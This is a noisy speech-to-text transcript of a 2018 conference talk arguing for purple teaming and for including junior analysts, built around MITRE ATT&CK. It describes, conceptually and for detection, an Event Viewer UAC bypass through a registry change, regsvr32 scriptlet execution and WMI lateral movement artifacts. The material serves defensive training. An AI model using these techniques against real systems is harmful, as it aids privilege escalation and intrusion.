BSidesAugusta 2018 - Joseph Pilkington - Purple Reign: Elevate Your Analysts, Build Your Playbook

could've been

rookie mic mistakes all apologies alright I'll go ahead and continue so back to the saying so you know hopefully I can identify some things that you know that maybe you even if you are as an organization or utilizing purple team that you're missing a little bit out of maybe some additional benefits that you can get for purple teaming in your environment or as an organization and answer some more things we can do with it to improve our team's workflows build a playbook for your team's to utilize during live ops so what is purple teaming right first I will start by kind of defining give you a little background of you know traditionally what purple teaming has been made up of and and how

it's being done so you know purple teaming is done by emulating a technique or a series of given techniques in a controlled environment what that does is allows the team to kind of observe those techniques actually be able to write a detection for that technique or identify a gap where maybe maybe I don't have enough data being collected to capture and observe and write a detection or an analytic for this technique but essentially it's complete transparency right it is not blue versus red at all there's not pitted against each other it's essentially either you know a person or persons going through both of those functions emulating that technique as if you were a red teamer but at the

same time knowing exactly what's coming across the wire so that you can observe it as a blue team or you know and then have the opportunity to better detect that technique in the future so purple teaming is not over seeing a red vs. blue exercise so you know I didn't research as I'm going into this talk kind of making sure I'm not a crazy person that what I think about purple team and how it exists and I did see a few times reference like you know you get the definition of red blue and purple teens and one of the things I saw everyone saw an article you know as the term mention of purple team just

facilitating a good exercise of red versus blue and that's not really a purple teaming it is a tall purple teaming removes that competition factor and really just come combines those teams into making them one unit that's just meant to you know collaborates better write better detections and you currently have give yourself more coverage of these techniques than you currently have or maybe identify gaps where you're not able to have that coverage so yeah not necessarily I'm not facilitating a red versus blue we have white cell and things like that there serve that purpose in an exercise environment so just quick comparison you know Red Team obviously acting as the adversary they're all you know is to achieve

actions on objectives and should be to create training for blue right so accurately emulate some kind of threats you know and try and be Blue Team Red Team always attempting to evade blue you know it's kind of I want to win I don't want to lose kind of thing so blue team traditionally the defenders in that equation they're gonna you know observe report on those techniques that they've seen and then they're gonna you know take action whatever the exercise outlines for what you're supposed to do when you observe that red activity but those teams are pitted against each other and that you know effort of I'm you know I'm trying to bypass you or I'm

trying to stop everything you do or whatever it's kind of what purple teaming removes by like I said combining those teams into one unit one function right so you can either be you know purple team you can be the person on keyboard that emulates the technique and the one on the other side of the keyboard that's helping write that detection right so it just removes that competition factor it really allows you to thrive and getting to see everything that you've done on the environment has a red teamer or just being able to see that technique in full as a blue team ER because you fully expect it to come at you right like you know what techniques

being emulated it's been identified that these are the techniques you're gonna cover in a session or an activity or anything like that so how is purple teaming done one really really important step purple teaming is you need to choose a framework so and the reason I say that is because you need to have that list of techniques that you as a purple team need to be able to emulate all right you need to be able to decide whether you can detect it how you detect it or where those gaps are and so to have those techniques identified somewhere we would utilize a framework for that so we use mitre attack I think it's the most you know cumbersome

framework that we have out there that fully accurate accurately defines all the different techniques that are possible from an adversary away from initial access you know to exfiltration so mitre has over like 200 techniques so obviously this is not something you're choosing a framework and you're gonna go sit down and in one session you're gonna think that you're gonna be able to emulate and then write detection for all those techniques or write analytics for those techniques if it's something you're needing to hunt for but then at the same time it's something you can break up into different sessions and over time kind of achieve you know mapping out the entire matrix and what your capabilities are against those

techniques so how do we emulate those techniques so there's a lot of open source tools out there right so there's PowerShell Empire and puppy & Co ADAC all these things have been created that really make it easy to facilitate you know you emulate an adversary it's something red team's used often now obviously there's paid tools out there as well it can do all this but just list some open source ones they're the easy to grab really easy to use but they are more manual right so then as you can see on that next bullet there's actually been a lot of development more recently on automating that Red Team side of it which it's really really helpful in an

organization that's trying to cover a lot of technique so just say a small organization may not have the same kind of manpower or time to dedicate so you can use those frameworks to them fully automate at least the majority of those attack techniques right so we got an example like uber meta project you know miters caldera reg Red Canaries atomic Red Team and then in games Red Team automation tool so they all offer something a little bit different you know some of these are say like Red Team automation and the atomic Red Team tools are basically just sets of scripts and instructions on how to emulate these techniques in an environment where as the other two may come with a VM or a

set vm's and scripts that you actually stand up in environment and then in that environment these techniques are emulated but essentially what that allows you to do is instead of having to manually one-by-one figure out how to you know kick off that technique within one of the manual tools like an empire or Co a deck or anything like that you actually have the ability to easily script those techniques just so you're able to observe you know what they did on an endpoint able to try and write that detection of that analytic that you'll need to be able to find this in the wild so an important part of a purple teaming is making this a cyclical

process right so it's not something where it's throwing everything against the wall and see what sticks it's something that you need to be able to evaluate and measure success over time so an example of that would be you know I we did you know 20 technique first session that we ever did and and then maybe we don't ever get back to those 20 techniques until we've you know done enough sessions to kind of cover every technique on the miter attack matrix right but then when we do get back to that set of 20 and then we're kind of trying to either you know revamp any current defections we have maybe a techniques been modified but it's kind

of close to how existed before you know a new binary is also found to be used to emulate that technique or whatever in the wild what you should be able to do is measure your success and have you improved in your ability to detect that technique over time right so have I you know maybe when I very first started this I kind of had enough data to where I could hunt for will say some kind of privilege escalation technique but then over time what you're able to do is say hey you know what you know this next round a purple team we actually found out how we could automate some of that and we actually have a flirt now in this

process and or when this privilege escalation technique is seen in our environment or something that so that you're improving on that process over time right so just a little map of kind of what you know like what this should look like right so the first time you're going in that purple team exercise your concentration is just on writing detections and analytics like I said so whether it's I can fully automate this and create an alert from my analyst in our network or hey you know what we have the data to hunt for this so I can write an analytic that helps us you know carve out some of that data that we're able to collect in our environment and still

identify didn't identify just more in a proactive way right that's still a way to detect that threat as long as you do in those proactive measures so as you're writing those detections and analytics you know the next step would be you need to implement those into ops and then what's going to happen when you implement them into ops is you're going to have some that are probably really successful and some that are really terrible and how do you measure that probably by false positives and false negatives right so false positives being very easy to identify you know I created this the automated detection technique for this new hotness you know technique that was just released a few weeks ago but then when I

find in the process is that maybe it closely aligns with some kind of administrative action or something on my network to where it generates a ton of false positive alerts right like that obvious action that should be refined and so you should take that back to testing so false negatives are obviously way harder to identify but you will stumble upon in your environment where you know maybe you've identified an attack of some sort and then as you're kind of broadening correlating data about that attack you find that at one part you know they use that privilege escalation technique that you thought you wrote a detection for or that you ran that hunt for and you didn't

identify right so why didn't you identify it I'll be a false negative something where you can again kind of go to that next step where you take those those sections and analytics that you've written and refine them and then re-implement and then as soon as you know if you're kind of working through that process of refinery implementation then you're going back to writing new detection x' and new analytics and the reason you always circle back around to writing new is because things are always changing right like the adversary is trying to stay one step ahead of you so the adversary as soon as you know there's a good set of detections out there for a specific technique they're

gonna modify it just a little bit and again in the keynote this morning they talked a little bit about this right like all I have to do is modify something if you're identifying a string of some sort that's a pretty easy change for an attacker to make right so you have to make sure that you're going through those constant refinement of those analytics and then working them back into your daily workflows so who are these purple teamers so it's kind of really bringing from one of my main points in today's talk so currently at least in the organization organizations that I've seen and then even in the research that I did you know kind of

lead enough to want to talk about this senior security engineers Rd guys senior you know Tier three analysts right what you're not seeing here are junior analysts or at least not a lot they're rarely involved or have a very minor role in purple teaming usually if any role at all right so what I've seen a lot of organizations is that tier 1 or tier 2 guy is maybe they're doing some investigating there triaging alerts but then when we step over and we branch into actually leveraging these purple team techniques it's a couple of the more skilled guys in the shop that are going through that process fully on there you know emulating techniques writing detection 'he's

kind of working that into the daily ops workflow and junior analysts kind of see almost none of that other than a new detection when it pops up right but what that does is kind of removes the ability for that junior analyst to understand that technique as well as that senior analyst uh so obviously a senior analyst has seen more that's why they should be running that exercise for sure they should be in charge of how that's going right but having those junior analysts involved is going to drastically drastically increase their you know ability to identify these techniques in the wild and I'm speaking from experience there so how is this being used currently in organization so it's

not being used by all organizations obviously you know it's either teams haven't been exposed to it enough you know or they don't maybe see that it has enough value to kind of be something that they work into their normal flow you know you feel like the red team blue team stuff they do or the penetration test they do or whatever exercise that they do as a team are more beneficial than they think purple teaming are or maybe you know they just under exposed to it not aware of really benefits it'll offer the two main functions that I see it for purple team is used is either you know I I just want to take my current

toolset that I have say I have sis Mon I have security onion I have some tools you know in my environment this is what makes up my toolset and I just need to throw some techniques to see what would this look like in my given toolset how would I detect it in security I mean how would I detect it in you know with sis Mon logging or anything like that right so that's what it's functions that can be really really valuable to an analyst especially if an analyst is new to that tool set right just seeing what that analyst should expect to see when that attack maybe comes across the wire but more what it's used for and this is

really the power in it is used for writing those advanced detection zin analytics so not necessarily toolset specific you're just trying to emulate a technique in a controlled environment where you can collect as much data as possible about that technique and i gives you the ability to write as good of a detection as you possibly can right in doing that you will likely identify apps and your coverage right you'll say like I through this technique and we saw one kind of minor artifact was not something you could accurately identify this with and that kind of helps you identify those gaps in coverage so that's mainly what it's used for is the ladder to you know help you observe

everything as that technique comes across the wire right that advanced you know a detection or analytic so purple teaming is not new this has been around for a while so funny that he mentioned it this morning as obviously I didn't slides after this morning but Dave Kennedy are speak or Kino speak he talked about this back at Nanak on like 2014 and during right as he's leading in that talk about purple teaming he's saying you know hey this isn't new to him at that time either I like he had heard several other people talking about purple teaming at the time and it just hasn't really caught on as far as like enough buy-in for people really finding

the value in it to replace the traditional red versus blue and stuff that most organizations still go through and there's still a function for Everest blue I'm not saying that there's not I just feel like purple teaming has additional benefits and kind of some equivalent and some trade-offs as well so again this is not new some things have definitely changed since you know probably the talk back at Nanak on when Dave talked about her when purple teaming first came out one of the things that's changed a lot is attack frameworks like how much attack frameworks have been built up that is an extremely useful tool right because without an attack framework to utilize saying these are the deck these are the

techniques that I have to identify or that I have to map my capabilities against then really all it is is a free-for-all of you choosing what you see either in you know malware research articles anything like that as what is an actual technique in the wild you categorizing that as what you find important or what not and then those would be the techniques that you emulate right but you're always gonna miss something there so having something like mitre we've got that complete attack matrix built out showing all those techniques really helps us map our capabilities to that a so like you know one-for-one mapping another thing that's really changed since then I think is experience

required to kind of do the red piece of this right I talked about a little bit with the automation but I mean there's a difference in even just with one of the fully automated or with one of the manual tools getting into like a PowerShell Empire having to learn how to use the modules like oh I want to use this persistence module for a user land and whatever right like even that is a little bit you know on a new analyst would be kind of hard to do as opposed to and one of the automated frameworks I mentioned where you legitimately look at I want to run this technique I run you know Python persistence bla hit enter and that

technique is emulated on my end point where I'm deployed where I have my tool set where I'm monitoring for those behaviors right it's it's gotten a lot easier for us to do these purple team activities because of that effort so appreciates to all the the open-source community out there that's put all these tools together because they really really make it a lot easier for especially smaller teams to go through purple team exercise and be able to kind of scale that exercise and be able to you know launch that many techniques to where it really is a benefit to them and not something that's to have you have a workload so purple teaming can do even

more right so I've already hit on this a little bit but I think it has just a huge amount of benefit to a junior analyst so you could not take a junior analyst and say you are going to go do a purple teaming exercise on your own that's not a great idea right they may not know how to operate in that environment they may not know how to emulate the techniques even the automated tool at first they may not know all the data that they need to collect but that effort being guided by a senior analyst does that senior analyst is gonna be going through these purple team efforts anyway can be so so helpful so some obvious points and I'm

gonna go ahead and say anyway things are easier to identify when you've seen them before right I mean that's it's one of those muscle memory things right like it's if I've seen this and I've seen all the artifacts that could leave behind I probably have a better idea of how to react to it what other data to collect and all those things so train as you fight there's a reason train as you fright approach you know it's been so popular especially in the military but for so long right and that's because you're gonna fight like you train so in that red versus blue cyber knife fight environment we're like yes we get good training out of

but it's very much like not a cyber Knife fight that you're gonna see in the real world it's maybe not as helpful to a junior analyst as saying hey you know outside of like did I win did I beat blue team can I just say that I successfully identified this technique and when I did I understood a few things you know like all the peripheral artifacts that technique might create and then also what this is gonna do is allow those operators to understand better like what that is involved with a minor attack matrix like where is this ad in the kill chain where does this fit into an attackers like what does give an attacker on that environment right if

you're going through all these exercises it's just enabling those junior analysts to understand that a little bit better than they are when they're just told sit here in triage Alerts right so even if it's you know just semi kind of frequent running them through these purple team just has so many additional benefits for junior analyst I feel like it's also beneficial for red team so red teamers usually don't like to tell blue teamers what they're gonna do before they do it it's not practice that's used very much but it's extremely beneficial red teamers as well so I've been talking about this from a complete blue perspective and a lot of this talk is on the blue side right like on the

traditional defender side but it can be really really helpful for you know that attacker to see hey when I throw this technique it actually creates this artifact that I never knew it created before it maybe if I alter that technique just a little bit and I improve on my own techniques and it's gonna only challenge then blue or during your purple team activities for you to write a better detection for it right so and you get to see those kinds of things as a red teamer because of the fact that you're also getting to kind of peek in on the blue side where you usually don't see as much you usually hit that button and then you either get your call back

or you don't I kind of figure out where to go from there right like did it did it stick against the wall or not but being able to actually say okay I got my call back but then I also see all this additional recorded behavior that I never really understood them it happen in the background before that can be huge for a red teamer so another thing is tools so I'm not saying don't use tools right like red team tools are amazing so they allow us to not have to carry such a heavy burden of remembering every single thing like and they also make it much much more manageable to scale a red team engagement right because you can manage

host so much easier inside a red team tool where you can kind of collaborate list those hosts out see what you have as far as permissions on how somebody like they serve a good purpose but what tools sometimes do is force those red teamers into that mindset of like I just have to point click I guess that easy right like I can just put in the IP that I know I'm supposed to be going after here point-and-click instead of like actually fully understanding what's going on in the background right so again not saying don't use tools but then you know just insight like this is really helpful to understanding what those tools are doing you hit enter so

it's also beneficial to the blue team to have a red team or they're you know blue team can do this all on their own they can play red as well it's gonna be really beneficial obviously to sit right next to a red team or who said no I've done this technique before there's a few different ways to do it we can try them all see how your detection fits against them all modify if we need to and then test again right as opposed to like as the blue team or I'm probably gonna say I'm just gonna try this one technique that I have right here because I know I can emulate it once right so just very

very beneficial for both parties with red team being involved all right so real-world examples so one of the things that I would like to do I'm gonna do a little bit of my giveaway here but the kind of purpose of these is to be you know look at it from a junior analyst perspective we're gonna look at maybe I get an alert what data would I get with that alert and then what am I kind of missing there and how maybe I wouldn't be missing out on that data if I understand the technique I understand maybe this additional query I need to run what data I need to correlate this that right but we'll work through and

I'll do some giveaways as we're going through these slides so right we detect a technique so what right I have an alert for UAC bypass so what does that mean right like I'm gonna get some kind of alert data for some I'm guessing binary that attempted or successfully execute a UAC bypass more than likely does everybody know UAC user account control and trying to bypass user account control here okay so alert data this is not like specific to a certain platform at all or anything this is just some generalized what I would get for alert data in in a lot of tools this is mostly what you'll see right you're gonna get a process name process path paid parent process

name maybe some command-line arguments signer if you're collecting that kind of stuff on a binary but so what right like if I I'm a tier one analyst and I've not gotten time or I've not gotten that exposure to say The MITRE attack or really getting to dive into these techniques at all what does this mean to me I can quit Google UAC bypass like okay cool this is a you know it's a privilege escalation techniques helpful attackers trying to escalate privilege but still what now right like what is my next step as a junior analyst if I'm seeing a technique in the wild that I've never gotten to see before so is Event Viewer malicious like Event

Viewer is built-in windows process right it's like so is Event Viewer malicious because the parent process like that's where that came from launched what looks to be me me cats as a junior analyst I can kind understand that looks like me me cats to me does that make Event Viewer let's just know so can anyone tell me what the technique ID is the mitre attack technique ID or you a bypass for hold on this is for a wireless adapter Google is fine you can google it I got a few things to give away so I'm asking a few questions so you know what tell me what the mitre attack technique ID is for a UAC bypass stop with the t34 numbers yep

one zero eight eight all right thank you very much perfect hey Google's our friend right I mean I wouldn't expect anyone to I have fully memorized the attack matrix I'm sure somebody has done it I have not okay so mitre attack technique 1088 can anyone tell me is anyone familiar with that technique like an show hands maybe okay so if I'm emulator that attack technique or if I'm actually executing the technique in the wild can you want to tell me what has to be done before spawning event viewer that's going to actually allow you to elevate privileges and bypass UAC guesses are fine too nope not run DLL so it's gonna be the addition or modification of something on

the endpoint modification of the windows know starts with an R registry all right yeah so exactly right so it's modification in the Windows registry so it's actually specifically gonna be a modification to a registry key a modification to the registry key containing that MSC file shell open command so can be HQ current user it could be a couple different hives right but so essentially you can actually write looking for the modification of this registry key for containing the MSC file shell open command and you can actually see if we're collecting like just this my I'm collecting registry events right you can actually see now this registry event that exists and you can see process name looks like it's

modified by PowerShell some kind of you know encoded command off PowerShell actually had made that registry modification right so without going through this specific and I'm putting you guys on the spot cuz obviously you guys didn't go through this exact technique yesterday if you've purple team did at all but without going through that purple team activity looking for this technique right like how would I know that how would I so you know if I see that alert do I think you know do I do process lineage on Event Viewer because it can come from something other than the process that actually detonated Event Viewer that does not matter at all you know the registry key could be added

by a completely different parent process then calls Event Viewer and spawn this technique so you know without knowing that okay welcome to confirm this I should probably go see what file modified that registry key right and in doing so you'll be able to find out okay it's PowerShell so that gives you as an analyst a little bit better ability to go in and triage this alert hopefully this makes it sense several I'll give you another example here so I'm gonna have another alert right so I have an alert for regice PR thirty-two scriptlet execution so squid we do hopefully all familiar this is the fun one by Casey Smith or sub T with this example so

alright again we're gonna get alert data so I'm gonna get processed name paid path command line I can write a detection purely basically off of this command line even though you have to worry about some string variables stuff that can change but so can anyone tell me the mitre attack technique D for red serve 32 for the practical packet analysis sorry hold on you said it first right yep here can you I'm gonna that's a so it's a long walk thanks alright so yes it's t1 107 all right now more advanced hopefully you're all on the miter attack matrix page for the technique ID and ready to help me answer this next question right now

right like we're all there ok perfect we're purple teaming together okay kind of so what you know so what this technique is essentially doing is register 32 is loading this thing object DLL and allowing to execute that column script which is essentially just an XML file so whatever code is being executed actually lives in that file can anyone tell me the file path where I could go grab that within a short time frame and if after this alert

temporary ernet files perfect exactly so same thing you would see if you actually had you know internet explorer open and you clicked on a binary and instead of clicking save you click run and that file has obviously temporarily saved to a location so that it can be executed right so same thing you'll actually see it saved in temporary internet files so right what else what else do we need I need that file probably because of the fact that this technique can be you know like utilize to write code into memory so if I don't have anything after this point that's actually on disk as that I can help either confirm or deny like what happened next you know how do I

confirm this was malicious where do I see that code at you could go grab the file right here so a quick file search or if you're collect final events right being able to search for that file by file name and knowing that it's in the past for temporary internet files you don't need to know user specific or anything like that you can quickly pull that data back you probably likely carved it out in Breaux logs or something if you're collecting these type files so again I can take that and I could actually see OCO so this is a small section of what that code would look like right but then I can say okay well it actually did

execute power shell temporarily I can go back and maybe look for this event maybe this event didn't alert but I can go back do lineage now this event kind of looked for what came before what came after so without again seeing that technique and seeing like all of its behaviors knowing the files that it drops or the example before the registry key that it creates it's kind of hard really hard for a junior analyst to know what do I do next when I get this alert right and so purple teaming can really really really drastically help them in understanding some of these things so again it's not going to be like I know everything because I fully executed

purple team against a minor attack matrix but it does give you kind of that muscle memory in responding or reacting to some of these techniques when you actually see them in the wild so what can we and I say we as a community what can we do differently right so involve analysts of all levels you know pros to this obviously or that again I've mentioned muscle memory a few times but that reaction time for an analyst and the ability to either know what to do next or even be able to respond to this if it's something you need to take you know a meeting remediation actions on right away is going to be much better the second or

third time than it was the first time right so you know help your analysts and understanding what data do I need to correlate right like I said before what registry key was dropped or modified or what file was created or you know what user logon event would have had to take place prior to this happening so then cons you know and talking about this with a few fellow analysts some analysts that are much senior to yours truly I kind of got the everything I'm talking about here with muscle memory and all that stuff it's kind of saving time right in the long run you know the time that it takes for your analyst to react

to a technique the time that it takes you to do this or that and then the callin loops brought up was you know okay the time that your senior analysts are then having to invest in you know facilitating these exercises with junior analysts that they might be losing to time that's spent writing detection techniques on their own right like they're the experienced ones they're the ones that could very likely just do this on without involving junior analysts at all I would my argument to that would be you're probably right in the beginning you're gonna lose a little bit of time as a senior analyst and maybe the frequency that you're able to you know like maybe emulate some techniques in a

given purple teaming activity but over time all you're doing is building more purple team alright so over time you will catch up that speed and probably eventually surpass it because you've created a much larger purple team right that has the ability to do this and maybe they are working on refining tactics and not always doing it on creating new but at the same time more people the quicker that's gonna go as well so I really think you can utilize purple team II to elevate your analyst right part of my time on my talk I think that you know it can you have to help your analyst grow right like you have to facilitate an environment where you

allow them to engage in these activities and kind of alleviate that so what or you know that that mindset right of an analyst like I see this in training all the time I said well I enjoyed myself I do a of training and so that's one of the major things that I see is uh you know I teach someone how to see something you know specific to our product or not and the next thing I get is why do I care right and so you can kind of alleviate that by giving them the background on the technique that you're trying to teach them to identify in the wild so you can elevate your workforce right

you're gonna give them that tools and experience by including them in this and then you know you're just essentially get them to look beyond the alert give them the ability to know you know what's my next step what do I do to correlate data what's you know what do I do to triage so we can also do more feel like in the daily operations that purple teaming can help us with daily ops you know testing these techniques I said this a little bit earlier you're gonna identify either holes that you have in coverage or you might also identify things that you can you know fully automate or things that are harder for you to catch but you can

do them and hunting you know and that can help you build what is known as a heat map which in turn can help you build your PlayBook so in building your own playbook you know emulation of these techniques can help you build that heat map and I'm just piggybacking off a Roberto Rodriguez I don't know if you guys have read if you've not read how hot hunt team great article about Mac mapping your hunt team's capabilities to a framework such as mitre right so we can do the same kind of thing here and and I you know a little bit different than then Roberto when he talks about it but you know I'm primarily focusing on

when I write a detection or an analytic do I have something that's fully automated as in it's gonna alert when it alerts I can take the response action on that alert or don't have something that maybe has a little bit of alert functionality but maybe we're missing some data to always know I have a true positive there do I have no detection functionality at all but I do collect enough data to where I can hunt for it so a lot of times this might be the case with things you might try and create a section for and they have a false positive like the data is there but the detection you write has too high of a

false positive rate you may just have to do that as a proactive search and then either you know maybe partial data or you know like I think I can identify that technique but I really may not have enough data in general to fully guarantee that that's what you're seeing when you see it or just I don't have enough data you know I don't have a tool that even fits that mold or this technique of what we're trying to identify wouldn't have that capability so when you map those out now this is just a random example of like what that could look like on the miter attack matrix you know you've mapped those say okay for these techniques I can actually I

have a fully automated detection in which I can rely on an alert to you know tell me if this is happening in my environment versus you know what's more manual or what am what am I not able to do at all in my environment and it's very very important to understand where those gaps are so identifying strengths and weaknesses you know it's going to help you build that ops playbook so Ops can't be like telling your analyst just to go find what's bad on the network right there should be a given set of you know of instructions or you know like tasks that an analyst at each level has to complete each day whether that's

triaging alerts or hunting for something or you know like collecting more data so that you can dig through it and a lot later on those tasks can essentially be mapped out to identify they like review and triage automated detection some four techniques figure out a way to collect that additional data so for these first two specifically there should be prioritization of efforts right so when you're looking at alerts that I'm triaging or you know techniques that I'm hunting for efforts should be prioritized so different techniques have different severa tees have different rights so it might be where an attacker is at in the you know attack lifecycle maybe it's more severe to me if an

attacker is closer to exfil than it is if it's like the first execution event I've seen because it's several actions on objectives deep at that point right or maybe it's more you know more severe to me sorry if you know if it's a execution of it that it is a discovery because I know execution means hey probably pretty close to initial access malicious code getting executed in some way shape or form on my box whereas discovery means you know that attacker is basically doing some situation awareness you know maybe trying to move laterally or trying to discover resources they have access to right but either way like this is determination that's made up of what's important on

your team and how you categorize that but it's taking what's important for you as techniques to identify correlating that with what you do well what you don't do well and that should help you build your priority list right so if there's some people it's very important to me and it's something that I have to do manually that manual piece should be built into one of your higher tiered analysts playbook every single day right give you that you know like utmost confidence and identifying those techniques so let's so in a you know an ideal world where I have a strongly enough man's team that I can you know say I could treat every technique as equal you make that prioritization on

your own in less mature socks or teams you might actually need the ability to have that driven by intelligence and so when I say that I'll bring up the car which is the cyber analytics report oh sorry repository exploration tool so I'm just as an example here you know I can use this to kind of map out let's say I'm a financial institution and I want to look at threats like Lazarus group which mainly targets financial institutions and what that'll do is actually map out ok these are the main techniques used by that adversary and there's more than one that you would have to do this for but just saying you can use you know especially for

undermanned team where you kind of it's hard to treat every technique as equal you can use this kind of intelligence driven data to help you prioritize what you should behave you know as important in your environment right

so you know I think that everyone here could benefit from either you know purple teaming or maybe taking purple teaming efforts that you're doing and you know involving those junior analysts so having that cyclical process like I talked about earlier to make sure that you know you keep pace with your adversary your adversary is always always advancing their TTP's they may not always use advance TTP's if you don't force them to if you have you know like SMB open to the Internet that's pretty easy for an adversary but as you force adversaries to use more advanced techniques they will create new ways to get into your environment and move laterally in your environment to exfil

from your environment or whatever that is right and so having that like process of going back through reiterating through new techniques writing new detection make sure that you're keeping pace and mitre does a great job of keeping that updated and the community is really great especially all the security researchers in this community about you know sharing that stuff is a good squiggly-doo is a good example the register of 32 attack I showed where you know subti hey I found this you know is what you're able to do with it and then not very long after apt 32 being using it in real world attacks like all over so really really good useful of you know making sure they

keeping up with those techniques as they get added so you know through utilizing purple team your teams are gonna get a you know your personnel your analysts gonna get better understanding of things like the attack matrix right like what does this mean for an attacker if I'm in you know this stage of the lifecycle what does this privilege escalation technique do for me you know is it hard to emulate is it easier in a certain environment any of those things so you're you know they'll get a better understanding for those manual processes of how hard it is you know to go through those detection zhh and then how to correlate data right so that's an important piece to me that I

think junior analysts take away from this more than anything is I've seen this attack before I know when this happens you know it does expires II and I can correlate that data that you might not be able to collect in every alert right like you can only put so much data in an alert to give to an analyst to show this is something happened and that analyst has to have some way to know how to go ahead and correlate those techniques or sorry correlate that to the technique that's been identified so you know in closing here so purple teaming is a practice that I think you know organizations of all sizes and all manpower should be at least attempting

to emulate or attempting to to act on doing these exercises inside your environments it's gonna do nothing but benefit your junior analyst there's a lot of you know it's really really easy to get started you know you're gonna improve your analyst abilities and your team's capabilities overall as you not only build more capable analysts but better purple teamers who can do a better job of keeping up with those recent threats right and making sure that you have detection x' you have analytics to identify all of those in the wild and again like the last one i'll make again is very easy to get started with all of the open tooling and documentation kind of guidance that's

out there right now and so i just think it's very very valuable and still pretty much underutilized in most organizations currently so that is all I have for you so I have a couple more things of swag to give away if you'll give me another two minutes I just wanted to walk through another couple of examples I'll give some people a chance to google again or maybe redeem themselves as we ask a few questions here so I'll try and keep these easy so who likes lateral movements yeah everybody likes lateral movement right how about WMI lateral movement okay so if we use this WMI to move laterally to another endpoint what port is that going to initiate with on that distant

endpoint a corner over there nope nope nah nope not 389 not good do you think you're all kind of close she know so ok who said 135 first alright there you are I have a USB pin for you here in the front all right so let's just walk through this I probably have admin right if I'm utilizing or able to use WMI to move laterally across environment so then what Windows Event ID would I expect to see for a successful admin logon on that end point no so that would be a successful logon no I mean you can google it like I said admin logon 46:24 is a successful logon event 4672 perfect I have a USB fan for you alright so I'll

go ahead and end it on this last question for a nice little in-game notebook what would you expect the parent process to be on that end point whenever it spawns that process call create command or that built in PowerShell WMI CIM and say i spawn calc using WMI on that distant endpoint what's gonna be the parent process no it starts with WMI I'll give you that nope not wim equipment could be used to initiate this command but what's it gonna look like on the dissonant who just said that W my PR vs c which is w my provisioning so just i like going through these examples because kinda what you work through things you learn

as a purple team ER right and you get to see these techniques happen in the wild you get to record all those events and you get to hopefully kind of keep this as knowledge or google it like everyone else does so thank you guys very much I appreciate you coming out to my talk hope you liked it